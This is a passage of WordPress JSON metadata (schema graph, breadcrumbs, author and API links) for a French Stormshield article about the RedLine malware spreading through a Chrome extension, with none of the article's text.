Stormshield","isPartOf":{"@id":"https:\/\/www.stormshield.com\/fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/#primaryimage"},"image":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/#primaryimage"},"thumbnailUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2246992893-scaled.jpg","datePublished":"2023-05-10T11:00:11+00:00","dateModified":"2024-01-30T14:43:06+00:00","author":{"@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/89e687d23b5403c1953a1bfbdf00d80d"},"description":"D\u2019une extension web malveillante \u00e0 une campagne globale : focus sur une menace de cybers\u00e9curit\u00e9 utilisant RedLine.","breadcrumb":{"@id":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/#primaryimage","url":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2246992893-scaled.jpg","contentUrl":"https:\/\/www.stormshield.com\/wp-content\/uploads\/shutterstock-2246992893-scaled.jpg","width":2560,"height":1351},{"@type":"BreadcrumbList","@id":"https:\/\/www.stormshield.com\/fr\/actus\/malware-redline-extension-chrome-campagne-malveillante-envergure\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.stormshield.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Malware RedLine : d\u2019une extension Chrome \u00e0 une campagne malveillante d\u2019envergure"}]},{"@type":"WebSite","@id":"https:\/\/www.stormshield.com\/fr\/#website","url":"https:\/\/www.stormshield.com\/fr\/","name":"Stormshield","description":"Stormshield","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.stormshield.com\/fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/www.stormshield.com\/fr\/#\/schema\/person\/89e687d23b5403c1953a1bfbdf00d80d","name":"Lucas Rival","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/d9ba38a598497e2e115f72a0e747302808cdf63d9d61d9ffdb543e335d421c15?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d9ba38a598497e2e115f72a0e747302808cdf63d9d61d9ffdb543e335d421c15?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d9ba38a598497e2e115f72a0e747302808cdf63d9d61d9ffdb543e335d421c15?s=96&d=mm&r=g","caption":"Lucas Rival"}}]}},"_links":{"self":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/398497","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/users\/81"}],"replies":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/comments?post=398497"}],"version-history":[{"count":16,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/398497\/revisions"}],"predecessor-version":[{"id":418143,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/posts\/398497\/revisions\/418143"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/media\/402348"}],"wp:attachment":[{"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/media?parent=398497"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/categories?post=398497"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/tags?post=398497"},{"taxonomy":"business_size","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/business_size?post=398497"},{"taxonomy":"industry","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/industry?post=398497"},{"taxonomy":"help_mefind","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/help_mefind?post=398497"},{"taxonomy":"features","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/features?post=398497"},{"taxonomy":"type_security","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/type_security?post=398497"},{"taxonomy":"maintenance","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/maintenance?post=398497"},{"taxonomy":"offer","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/offer?post=398497"},{"taxonomy":"administration_tools","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/administration_tools?post=398497"},{"taxonomy":"cloud_offers","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/cloud_offers?post=398497"},{"taxonomy":"listing_product","embeddable":true,"href":"https:\/\/www.stormshield.com\/fr\/wp-json\/wp\/v2\/listing_product?post=398497"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}